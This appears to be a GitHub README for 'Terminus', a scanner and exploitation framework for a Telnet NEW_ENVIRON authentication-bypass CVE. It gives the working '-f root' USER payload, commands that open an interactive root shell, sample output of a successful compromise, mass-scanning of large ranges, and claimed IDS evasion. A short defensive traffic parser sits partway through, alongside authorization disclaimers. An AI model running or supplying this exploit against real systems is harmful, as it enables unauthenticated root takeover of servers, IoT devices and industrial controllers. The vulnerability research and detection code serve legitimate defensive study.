A security analysis engine for CVE-2026-24061 Telnet NEW_ENVIRON authentication bypass and privilege escalation vulnerability.
Terminus is a professional security research tool designed for authorized penetration testing and vulnerability assessment of CVE-2026-24061. This critical vulnerability affects legacy Telnet daemon implementations, allowing unauthenticated remote attackers to bypass authentication and gain root-level access.
CVE-2026-24061 is a Remote Code Execution vulnerability in Telnet services that support RFC 1572 (Telnet Environment Option). The vulnerability exploits improper sanitization of the USER environment variable during NEW_ENVIRON subnegotiation:
- Normal authentication: `USER=john` → prompts for password
- Exploit payload: `USER=-f root` → bypasses authentication, grants root shell
Impact:
- Complete authentication bypass (no password required)
- Immediate privilege escalation to root
- Full system compromise
Affected Services:
- Legacy Telnet GNU Inetutils telnetd (specifically versions through 2.7)
- IoT firmware with vulnerable Telnet implementations
- Industrial control systems with outdated Telnet services
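
From the defender's side, the NEW_ENVIRON behaviour described above can be checked in captured traffic. This is an added example, not Terminus code: it parses a client-to-server Telnet byte stream for NEW-ENVIRON subnegotiations and reports `USER` values that begin with `-`. The function names and the traffic built by `sample_reply` are constructed for illustration; the byte values are those defined in RFC 854 and RFC 1572.

```python
# Added example (not Terminus code): flag NEW-ENVIRON USER values that begin with "-".
IAC, SB, SE, WILL, DONT = 255, 250, 240, 251, 254  # RFC 854 command bytes
NEW_ENVIRON, IS, INFO = 39, 0, 2                    # RFC 1572 option and subcommands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3               # RFC 1572 field markers

def subnegotiations(stream: bytes):
    """Yield (option, payload) for every complete IAC SB ... IAC SE block."""
    i, n = 0, len(stream)
    while i < n - 1:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] == SB:
            buf, i = bytearray(), i + 2
            while i < n - 1 and stream[i:i + 2] != bytes([IAC, SE]):
                buf.append(stream[i])
                i += 2 if stream[i:i + 2] == bytes([IAC, IAC]) else 1  # IAC IAC = one 0xFF
            if i < n - 1 and buf:  # only blocks that were terminated
                yield buf[0], bytes(buf[1:])
            i += 2
        else:  # WILL/WONT/DO/DONT carry an option byte, other commands do not
            i += 3 if WILL <= stream[i + 1] <= DONT else 2

def environ_vars(payload: bytes) -> dict[str, str]:
    """Decode an IS/INFO payload into {name: value}, honouring ESC."""
    if payload[:1] not in (bytes([IS]), bytes([INFO])):
        return {}
    fields, i = [], 1
    while i < len(payload):
        if payload[i] in (VAR, USERVAR, VALUE):
            fields.append([payload[i], bytearray()])
        elif fields:
            if payload[i] == ESC and i + 1 < len(payload):
                i += 1  # the byte after ESC is literal data
            fields[-1][1].append(payload[i])
        i += 1
    out, name = {}, None
    for kind, data in fields:
        name = data.decode("latin-1") if kind != VALUE else name
        if name is not None:
            out[name] = data.decode("latin-1") if kind == VALUE else ""
    return out

def suspicious_users(stream: bytes) -> list[str]:  # USER values usable as an option
    found = (environ_vars(p).get("USER") for o, p in subnegotiations(stream) if o == NEW_ENVIRON)
    return [u for u in found if u and u.startswith("-")]

def sample_reply(user: bytes) -> bytes:  # constructed client-to-server sample traffic
    head = bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
    return head + bytes([VALUE]) + user + bytes([IAC, SE])
```

Feed `suspicious_users` the reassembled client-side bytes of a Telnet session; a non-empty result means the daemon was handed a `USER` value that would be read as an option rather than a user name.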
- High-Concurrency Scanning: Scan 1,000+ targets concurrently using AsyncIO
- CIDR Support: Scan entire network ranges (`192.168.0.0/24`, `10.0.0.0/8`)
- Dual Detection Modes:
  - Passive (default): Fast, safe, signature-based detection
  - Active Verification (`--verify`): Proof-of-exploit, confirms uid=0 root access
- Banner Analysis: Fingerprint daemon types and versions
- Risk Scoring: Multi-layered confidence assessment (CRITICAL, HIGH, MEDIUM, LOW)
- TerminusNegotiator Class: Clean API for Telnet protocol operations
  - `Terminus.handshake()` - RFC 854 compliant handshake
  - `Terminus.exploit()` - CVE-2026-24061 payload delivery
- Proper Option Negotiation: Avoids IDS/IPS detection through protocol compliance
- State Machine: Robust handling of IAC sequences (DO/DONT/WILL/WONT/SB/SE)
- Interactive Shell: Full post-exploitation shell with root access
- Command Execution: Execute single commands and capture output
- Evidence Collection: Gather uid, environment variables, system info
- Safety Mechanisms:
  - Requires explicit `--exploit` flag
  - Disabled in batch scanning mode
  - Audit logging of all exploitation attempts
- Terminal: Rich-formatted tables with color-coded risk levels
- JSON: SIEM/SOAR integration
- CSV: Spreadsheet tracking
- HTML: Detailed reports with statistics
- Markdown: Documentation-friendly output
The heart of Terminus is the TerminusNegotiator class, which provides a clean separation between protocol handling and exploitation logic:

```python
from terminus import TerminusNegotiator

# Initialize engine
negotiator = TerminusNegotiator()

# Step 1: RFC 854 compliant handshake
await negotiator.handshake(target="192.168.1.100", port=23)

# Step 2: Deliver CVE-2026-24061 payload
result = await negotiator.exploit(payload="-f root")
if result.success:
    print(f"Root shell acquired: {result.evidence['uid']}")
```

Traditional scripts (existing tools):

```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
```

Terminus engine:

```
Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment
                                                              ↓
        [Optional] Verified Exploitation → Evidence Collection → Report
```

- Python 3.10+
- Supported Platforms:
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
  - Native Linux (Kali, Parrot, Ubuntu, Debian)
  - macOS (with Python 3.10+)

```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version
```

```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Run setup script
chmod +x setup_env.sh
./setup_env.sh

# Activate virtual environment
source venv/bin/activate

# Verify installation
terminus --version
```

```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version
```

- `telnetlib3` - AsyncIO Telnet protocol implementation
- `rich` - Terminal UI and formatting (ANSI support on Windows/Linux)
- `pydantic` - Data validation and models
- `aiofiles` - Async file I/O
- `jinja2` - Report templating
- `pyyaml` - Configuration management
- `pathlib` - Cross-platform path handling (built-in)

Note: All dependencies are pure Python or have cross-platform wheels. No platform-specific compilation required.
Enable tab completion for faster command entry:

```bash
_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash
echo 'source ~/.terminus-complete.bash' >> ~/.bashrc
source ~/.bashrc
```

```zsh
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc
```

```fish
_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish
```

```powershell
# Add to $PROFILE (PowerShell sets environment variables through $env:)
$env:_TERMINUS_COMPLETE = "powershell_source"
terminus | Out-String | Invoke-Expression
Remove-Item Env:_TERMINUS_COMPLETE
```

Test it:

```bash
terminus <TAB>        # Shows: scan, exploit, version
terminus scan -<TAB>  # Shows: -t, -f, -p, --verify, etc.
```

```bash
terminus scan -t 192.168.1.100

terminus scan -t 192.168.1.0/24

# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

terminus scan -t target.com --passive-only

terminus scan -t target.com --aggressive

terminus scan -t 192.168.1.100 --verify
```

Check version:

```
PS C:\terminus> terminus --version
Terminus v1.0.0
CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework
Signatures database: C:\terminus\signatures.db
```

Passive scan (default - conservative risk assessment):

```
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00
╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│ Critical: 0              │
│ High: 0                  │
│ Medium: 0                │
│ Low: 1                   │
│ Info: 0                  │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │ Status    │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │ YES         │ -        │ 3522.22       │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
No vulnerable targets found
```

Active verification with `--verify` (proof-of-exploit):

```
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00
╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│ Critical: 1              │
│ High: 0                  │
│ Medium: 0                │
│ Low: 0                   │
│ Info: 0                  │
│                          │
│ Duration: 8.04s          │
│ Avg Scan Time: 8029.55ms │
│                          │
╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │ Status    │ Risk     │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES         │ ROOT     │ 8029.55       │
╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
Found 1 vulnerable targets!
```

Interactive exploitation:

```
PS C:\terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Attempting exploitation of 172.17.45.122:2323...
Payload: -f root
CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained
[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit
whoami
root
┌──[root@parrot]─[~]
└──╼ #
```

Key observations:
- Passive mode: Detected NEW_ENVIRON support but reported LOW risk (conservative)
- Active verification: Confirmed root access (uid=0), escalated to CRITICAL risk with "ROOT" verification status
- Exploitation: Immediate root shell without password prompt
What it does:
- Performs passive detection first (banner + protocol analysis)
- If vulnerability suspected, attempts actual exploitation with `-f root` payload
- Confirms root access by checking `uid=0` in response
- Escalates risk to CRITICAL when root access confirmed
- Outputs verification status in scan results
Use cases:
- High-confidence validation for compliance reports
- Proof-of-concept demonstrations
- Confirming exploitability before reporting to vendors
- Red team operations requiring evidence collection
Example output:

```
Target          Port  Status      Daemon             Risk      Verified
192.168.1.100   23    VULNERABLE  inetutils-telnetd  CRITICAL  ROOT ACCESS
192.168.1.101   23    VULNERABLE  netkit-telnetd     HIGH      Not tested
192.168.1.102   23    SAFE        OpenBSD-telnetd    LOW       N/A
```

Batch verification:

```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json
```

Note: Active verification attempts exploitation. Only use with proper authorization.

```bash
terminus scan -t 192.168.1.0/24 -o json > results.json

terminus scan -f targets.txt -o html -w report.html

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv
```

```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

terminus exploit -t 192.168.1.100 -c "id"
# Output: uid=0(root) gid=0(root) groups=0(root)

terminus exploit -t 192.168.1.100 --payload "-f admin"
```

```bash
terminus update-signatures

terminus verify -f results.json

terminus version
```

Terminus is designed for portable deployment - copy the directory to any Windows/Linux system and run without installation:

```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml
```

Recommended for Windows Red Team workstations - isolated Linux environment for deploying vulnerable test services:

```powershell
# Windows PowerShell (Admin)
# Install WSL2
wsl --install

# Install Kali Linux
wsl --install -d kali-linux

# OR Install Parrot OS (if available)
# wsl --install -d ParrotOS

# Verify
wsl -l -v
```

```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terrminus-CVE-2026-2406
./setup_env.sh
source venv/bin/activate
```

WARNING: Only in isolated lab environments. Never on production systems.

```bash
# Inside WSL2
# Install vulnerable netkit-telnetd version
sudo apt install netkit-telnetd=0.17-*

# Configure for NEW_ENVIRON support
# Edit /etc/inetd.conf to enable telnet

# Start service
sudo systemctl restart inetd

# Test from Windows host
# From PowerShell:
# terminus scan -t $(wsl hostname -I)
```

Test Terminus on all platforms used by your Red Team:

| Platform | Installation | Scanning | Exploitation |
|---|---|---|---|
| Windows 10/11 (PowerShell) | Yes | Yes | Yes |
| WSL2 - Kali Linux | Yes | Yes | Yes |
| WSL2 - Parrot OS | Yes | Yes | Yes |
| WSL2 - Ubuntu | Yes | Yes | Yes |
| Native Kali Linux | Yes | Yes | Yes |
| Native Parrot OS | Yes | Yes | Yes |
| macOS | Yes | Yes | Yes |

```python
import asyncio

from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore


async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f" Daemon: {result.daemon_type} {result.version}")
                print(f" Confidence: {result.vulnerability_confidence:.2%}")


async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()

    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return

    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print("Root access obtained")
        print(f"Evidence: {result.evidence}")


# Run
asyncio.run(scan_network())
```

This tool is intended ONLY for:
- Authorized penetration testing engagements
- Security research in controlled environments
- CTF competitions and educational labs
- Defensive security assessments with written permission
Unauthorized use is ILLEGAL and unethical.
- Authorization Required: Exploitation requires explicit `--exploit` flag
- Confirmation Prompts: Interactive confirmation before exploitation
- Audit Logging: All exploitation attempts logged with timestamps
- Single-Target Enforcement: Exploitation disabled in batch scan mode
- Rate Limiting: Prevents accidental DoS during scanning
If you discover vulnerable systems using Terminus:
- DO NOT exploit systems without written authorization
- Report findings to system owners through responsible disclosure
- Document findings using Terminus reporting features
- Follow coordinated vulnerability disclosure guidelines
- CVE ID: CVE-2026-24061
- Severity: CRITICAL (CVSS 9.8)
- Vector: Network, Unauthenticated, Low Complexity
- Primary Research: SafeBreach-Labs CVE-2026-24061
- Reference Exploit: telnet_rce.py
- Batch Scanner: TryA9ain CVE-2026-24061
- RFC 854: Telnet Protocol Specification
- RFC 1572: Telnet Environment Option
- 90%+ code coverage with pytest
- Unit tests for all core modules
- Integration tests with mock Telnet server
- Performance benchmarks (1,000 targets < 60 seconds)
- Scan vulnerable service (verify detection)
- Scan patched service (verify no false positive)
- Test authentication bypass (no password prompt)
- Verify privilege escalation (uid=0)
- Monitor IDS alerts (verify stealth)
- Performance test (1,000+ targets)
All paths are relative to project root - works on Windows, Linux, and WSL without modification:

```yaml
# config.yaml - Cross-platform configuration
# All paths relative to project directory
scanner:
  default_port: 23
  connect_timeout: 3.0
  handshake_timeout: 5.0
  max_concurrent: 1000
  rate_limit: 100  # connections/second

detection:
  passive_only: true  # Safe mode by default
  banner_timeout: 2.0
  heuristic_checks: true
  # Signature database (relative path)
  signatures_db: "./signatures.db"

exploit:
  require_authorization: true
  default_payload: "-f root"
  evidence_collection: true
  interactive_shell: true

reporting:
  default_format: "terminal"
  include_safe_targets: false
  verbosity: "normal"
  # Output directory (relative path - works on Windows/Linux)
  output_dir: "./reports"

logging:
  level: "INFO"
  # Log file (relative path - automatic directory creation)
  file: "./logs/terminus.log"
  format: "json"
  console_enabled: true
```

---
## Acknowledgments
- **SafeBreach Labs:** Original CVE-2026-24061 research and exploit implementation
- **TryA9ain:** Batch scanning approach inspiration
- **RFC Authors:** Telnet protocol specifications
---
